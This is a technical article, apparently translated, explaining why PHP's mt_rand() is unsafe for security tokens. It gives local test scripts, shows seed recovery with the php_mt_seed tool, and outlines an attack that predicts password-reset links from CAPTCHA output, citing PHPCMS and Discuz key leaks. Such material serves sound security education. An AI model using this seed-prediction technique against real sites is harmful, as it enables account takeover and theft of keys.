A deep look at the security of mt_rand() random numbers in PHP

  • 2021-08-10 07:00:25
  • OfStack

Preface

Some time ago, many security vulnerabilities related to mt_rand() were found, nearly all of them caused by misunderstanding how random numbers should be used. Here I want to point out a pitfall in the official PHP manual. Compare the Chinese and English versions of the mt_rand() page: the English version carries a yellow Caution box.


This function does not generate cryptographically secure values, and should not be used for cryptographic purposes. If you need a cryptographically secure value, consider using random_int(), random_bytes(), or openssl_random_pseudo_bytes() instead.

Many developers in China presumably read the Chinese version of the manual and use mt_rand() to generate security tokens, core encryption and decryption keys, and so on, which leads to serious security problems.
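As a minimal sketch of what the Caution recommends, the snippet below builds a token and a verification code with random_bytes() and random_int(). The helper name makeSecureToken() and the chosen lengths are assumptions made for illustration, not something taken from the manual.

```php
<?php
// Hypothetical helper (not from the article): build an unpredictable token
// from the operating system's CSPRNG instead of mt_rand().
function makeSecureToken(int $bytes = 16): string
{
    // random_bytes() (PHP 7+) throws an exception if no secure source is available.
    return bin2hex(random_bytes($bytes));
}

// random_int() is the secure counterpart of mt_rand($min, $max).
$code  = random_int(100000, 999999); // for example, a six-digit verification code
$token = makeSecureToken();          // 32 hexadecimal characters

echo $token, "\n", $code, "\n";
```

Both functions draw from the system's secure random source, so their output cannot be replayed from a recovered seed.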

Pseudorandom numbers

mt_rand() is not a true random number generator. In fact, most random number functions in programming languages generate pseudorandom numbers. I will not explain the difference between true and pseudorandom numbers here; only one point needs to be understood:

A pseudorandom number is produced by a deterministic function (commonly a linear congruential one) from a seed (commonly the clock). This means that if you know the seed, or the random numbers that have already been generated, you can work out the numbers that come next in the sequence (predictability).

Simply assume that the function generating random numbers inside mt_rand() is rand = seed + (i*10), where seed is the random number seed and i is the number of times the function has been called. When we know both i and rand, we can easily calculate seed. For example, substituting rand=21 and i=2 gives 21 = seed + (2*10), so seed = 1. Simple, isn't it? Once we have seed, we can calculate rand for any value of i.
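The arithmetic above can be written out as a small sketch. The function names toyRand() and recoverToySeed() are made up for this illustration, and the formula is only the simplified model from the text, not the real mt_rand() algorithm.

```php
<?php
// Toy generator from the text: rand = seed + (i * 10).
// This is NOT the real mt_rand() algorithm, only the simplified model.
function toyRand(int $seed, int $i): int
{
    return $seed + ($i * 10);
}

// Invert the toy formula: one observed output and its call index give the seed.
function recoverToySeed(int $rand, int $i): int
{
    return $rand - ($i * 10);
}

$seed = recoverToySeed(21, 2);    // 21 = seed + (2 * 10)
echo "seed = {$seed}\n";          // seed = 1

// With the seed known, every other output is predictable.
for ($i = 1; $i <= 5; $i++) {
    echo toyRand($seed, $i), " "; // 11 21 31 41 51
}
echo "\n";
```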

Automatic seeding in PHP

From the previous section we know that every call to mt_rand() computes a pseudorandom number from seed and the current call count i. The seed itself is set automatically:

Note: As of PHP 4.2.0, there is no need to seed the random number generator with srand() or mt_srand(), as this is now done automatically.

So the question is: when does the system seed automatically? If it reseeded on every call to mt_rand(), cracking the seed would be pointless. The manual gives no details on this point, and a search of the Internet turned up no reliable answer, so I had to read the source code ^mtrand:


PHPAPI void php_mt_srand(uint32_t seed)
{
    /* Seed the generator with a simple uint32 */
    php_mt_initialize(seed, BG(state));
    php_mt_reload();

    /* Seed only once */
    BG(mt_rand_is_seeded) = 1;
}
/* }}} */

/* {{{ php_mt_rand
 */
PHPAPI uint32_t php_mt_rand(void)
{
    /* Pull a 32-bit integer from the generator state
       Every other access function simply transforms the numbers extracted here */

    register uint32_t s1;

    if (UNEXPECTED(!BG(mt_rand_is_seeded))) {
        php_mt_srand(GENERATE_SEED());
    }

    if (BG(left) == 0) {
        php_mt_reload();
    }
    --BG(left);

    s1 = *BG(next)++;
    s1 ^= (s1 >> 11);
    s1 ^= (s1 << 7) & 0x9d2c5680U;
    s1 ^= (s1 << 15) & 0xefc60000U;
    return ( s1 ^ (s1 >> 18) );
}

You can see that each call to mt_rand() first checks whether the generator has already been seeded. If it has, a random number is generated directly; otherwise php_mt_srand is called to seed it. In other words, within the lifetime of each PHP CGI process, only the first call to mt_rand() seeds automatically, and every later number is generated from that first seed. The exception is classic CGI, which starts one CGI process per request and closes it when the request ends. Because it has to re-read php.ini, environment variables and so on every time, it is inefficient and rarely used today. In the other run modes, a process goes on standby after handling a request and waits for the next one; it is recycled only after handling many requests (or on timeout).
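The "seed only once" behaviour of the C source above can be modelled in a few lines of PHP. This is only a sketch: the class LazySeededToy, its counter and its toy formula are hypothetical stand-ins, and one object plays the role of one long-lived worker process.

```php
<?php
// Simplified model of the "seed only once" logic in php_mt_rand().
// LazySeededToy and its toy formula are hypothetical; the real engine is
// the Mersenne Twister shown in the C source.
final class LazySeededToy
{
    private bool $seeded = false;  // plays the role of BG(mt_rand_is_seeded)
    private int $seed = 0;
    private int $calls = 0;
    public int $seedCount = 0;     // how many times seeding happened

    public function next(): int
    {
        if (!$this->seeded) {
            // Stand-in for php_mt_srand(GENERATE_SEED()).
            $this->seed = random_int(0, 0xFFFF);
            $this->seeded = true;
            $this->seedCount++;
        }
        $this->calls++;
        return $this->seed + ($this->calls * 10);
    }
}

// One object stands for one long-lived PHP worker process.
$worker = new LazySeededToy();
$first  = $worker->next();   // "request 1": seeds, then generates
$second = $worker->next();   // "request 2": reuses the same seed
$third  = $worker->next();

echo "seeded {$worker->seedCount} time(s)\n";       // seeded 1 time(s)
echo $second - $first, " ", $third - $second, "\n"; // 10 10
```

However many times next() is called, seeding happens exactly once, which is why every request served by the same process draws from one sequence.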

Write a script to test this:


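<?php
// pid.php: print the ID of the process handling this request
echo getmypid();

<?php
// test.php: count how many requests are made before a different process answers
$old_pid = file_get_contents('http://localhost/pid.php');
$i = 1;
while (true) {
    $i++;
    $pid = file_get_contents('http://localhost/pid.php');
    if ($pid != $old_pid) {
        echo $i;
        break;
    }
}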

Test results (Windows + phpStudy):

Apache: 1000 requests

nginx: 500 requests

Of course, this test only confirms how many requests a single Apache or nginx process can handle. Next, verify the conclusion about automatic seeding:


<?php
// pid1.php: print a random number if ?rand is set, otherwise the process ID
if (isset($_GET['rand'])) {
    echo mt_rand();
} else {
    echo getmypid();
}

<?php
// pid2.php: always print a random number
echo mt_rand();

<?php
// test.php: wait for a new process, then collect 20 numbers from random pages
$old_pid = file_get_contents('http://localhost/pid1.php');
echo "old_pid:{$old_pid}\r\n";
while (true) {
    $pid = file_get_contents('http://localhost/pid1.php');
    if ($pid != $old_pid) {
        echo "new_pid:{$pid}\r\n";
        for ($i = 0; $i < 20; $i++) {
            $random = mt_rand(1, 2); // pick pid1.php or pid2.php
            echo file_get_contents("http://localhost/pid" . $random . ".php?rand=1") . " ";
        }

        break;
    }
}

Once the PID shows that a new process has started, the script fetches the mt_rand() output 20 times, each time from one of the two pages chosen at random:


old_pid:972
new_pid:7752
1513334371 2014450250 1319669412 499559587 117728762 1465174656 1671827592 1703046841 464496438 1974338231 46646067 981271768 1070717272 571887250 922467166 606646473 134605134 857256637 1971727275 2104203195

Take the first random number, 1513334371, and brute-force the seed:


smldhz@vm:~/php_mt_seed-3.2$ ./php_mt_seed 1513334371
Found 0, trying 704643072 - 738197503, speed 28562751 seeds per second
seed = 735487048
Found 1, trying 1308622848 - 1342177279, speed 28824291 seeds per second
seed = 1337331453
Found 2, trying 3254779904 - 3288334335, speed 28811010 seeds per second
seed = 3283082581
Found 3, trying 4261412864 - 4294967295, speed 28677071 seeds per second
Found 3

Three candidate seeds were found, a very small number, so each one can be tested by hand:


<?php
mt_srand(735487048); // seed manually
for ($i = 0; $i < 21; $i++) {
    echo mt_rand() . " ";
}

Output:

The first 20 numbers are exactly the same as those obtained by the script above, which confirms that the seed is 735487048, the value passed to mt_srand() here (1513334371 was the first output, not the seed). With the seed, we can calculate the number produced by any later call to mt_rand(). For example, this script generates 21 numbers, and the last one is 1515656265. If the site has not been visited since the earlier script ran, opening http://localhost/pid2.php shows the same 1515656265.

So we come to the conclusion:

PHP's automatic seeding happens the first time mt_rand() is called in a PHP CGI process. Whichever page is visited, every request handled by the same process shares the seed that was set automatically at that point.

php_mt_seed

We already know that random numbers are generated by a specific function, which we earlier assumed to be rand = seed + (i*10). For such a simple function we can of course solve for the seed directly (even in our heads), but the actual function used by mt_rand() is far more complex and cannot simply be inverted. The effective way to crack it is to enumerate all seeds, generate the random number sequence for each one, and compare it with the known sequence to check whether the seed is correct. php_mt_seed ^phpmtseed is such a tool. It is very fast: running through all 2^32 seeds takes only a few minutes. It can brute-force the candidate seeds directly from the output of a single mt_rand() call (as in the example above), and it can also recover the seed from ranged output such as mt_rand(1,100), where MIN and MAX are specified (useful in the examples below).
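The enumerate-and-compare idea can be sketched in plain PHP. This is not how php_mt_seed itself is implemented; the function name findSeeds(), the "secret" seed and the deliberately small search range are assumptions chosen so that the example finishes quickly.

```php
<?php
// Brute-force sketch: try every seed in a range and keep those whose first
// mt_rand() output matches the observed value. The function name and the
// small search range are illustrative; php_mt_seed covers all 2^32 seeds.
function findSeeds(int $observed, int $from, int $to): array
{
    $candidates = [];
    for ($seed = $from; $seed <= $to; $seed++) {
        mt_srand($seed);
        if (mt_rand() === $observed) {
            $candidates[] = $seed;
        }
    }
    return $candidates;
}

// Simulate a victim: a "secret" seed and the single output that leaked.
$secretSeed = 31337;
mt_srand($secretSeed);
$leaked   = mt_rand();
$expected = mt_rand();          // the victim's next number

$candidates = findSeeds($leaked, 0, 50000);

// Replay each candidate to predict the number that follows the leaked one.
foreach ($candidates as $seed) {
    mt_srand($seed);
    mt_rand();                   // skip the output we already know
    echo "seed {$seed} predicts ", mt_rand(), "\n";
}
```

A single output can match more than one seed, as the php_mt_seed run above shows, so each candidate still has to be checked against further known outputs.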

Security issues

Having said all this, why are these random numbers unsafe? There is actually nothing wrong with the function itself, and the official manual clearly states that the numbers it generates should not be used for cryptographic purposes (although the Chinese version of the manual does not say so). The problem is that developers do not realize these are not true random numbers. We already know that the seed can be brute-forced from a known sequence of random numbers. That is, as long as any page outputs a random number, or a value derived from one from which the random number can be recovered, the random numbers on every other page are no longer "random". Common places where random numbers are output include CAPTCHAs and random file names. Common security uses of random numbers include password-reset verification values and encryption keys. An ideal attack scenario:

In the dead of night, wait for Apache (or nginx) to recycle all PHP processes (which ensures that the next visit reseeds), visit the CAPTCHA page once, derive the random numbers from the CAPTCHA characters, and brute-force the seed from those numbers. Then visit the password-reset page. The reset link it generates is based on random numbers, so we can easily compute that link and reset the administrator's password.
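The last step of this scenario can be sketched as follows. Everything here is hypothetical: weakResetToken() stands for a reset-token scheme built only on mt_rand(), the seed value is arbitrary, and the brute-force step is replaced by simply reusing the seed, since recovering it is what php_mt_seed does.

```php
<?php
// Hypothetical reset-token scheme of the kind the scenario targets:
// the token is built purely from mt_rand() output.
function weakResetToken(int $length = 8): string
{
    $alphabet = 'abcdefghijklmnopqrstuvwxyz0123456789';
    $token = '';
    for ($i = 0; $i < $length; $i++) {
        $token .= $alphabet[mt_rand(0, strlen($alphabet) - 1)];
    }
    return $token;
}

// Server side: a freshly seeded worker shows one random number (for example
// through a CAPTCHA), then issues a reset token.
$serverSeed = 20210810;          // unknown to the attacker in a real attack
mt_srand($serverSeed);
$leaked      = mt_rand();
$serverToken = weakResetToken();

// Attacker side: assume the seed has been recovered from $leaked
// (for instance with php_mt_seed). Replaying the same calls in the same
// order reproduces the token.
$recoveredSeed = $serverSeed;    // stands in for the brute-force result
mt_srand($recoveredSeed);
mt_rand();                       // consume the leaked output
$predictedToken = weakResetToken();

var_dump($predictedToken === $serverToken); // bool(true)
```

The attacker only needs to know how many mt_rand() calls happen between the leaked value and the token, which is why the scenario waits for a freshly started process.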

Examples

PHPCMS MT_RAND SEED CRACK to authkey leak: the author "Rain cow" wrote this up better than I could, so just read his write-up.

Discuz X3.2 authkey leak: this one is essentially similar. The vendor has released a patch, and anyone interested can analyze it for themselves.
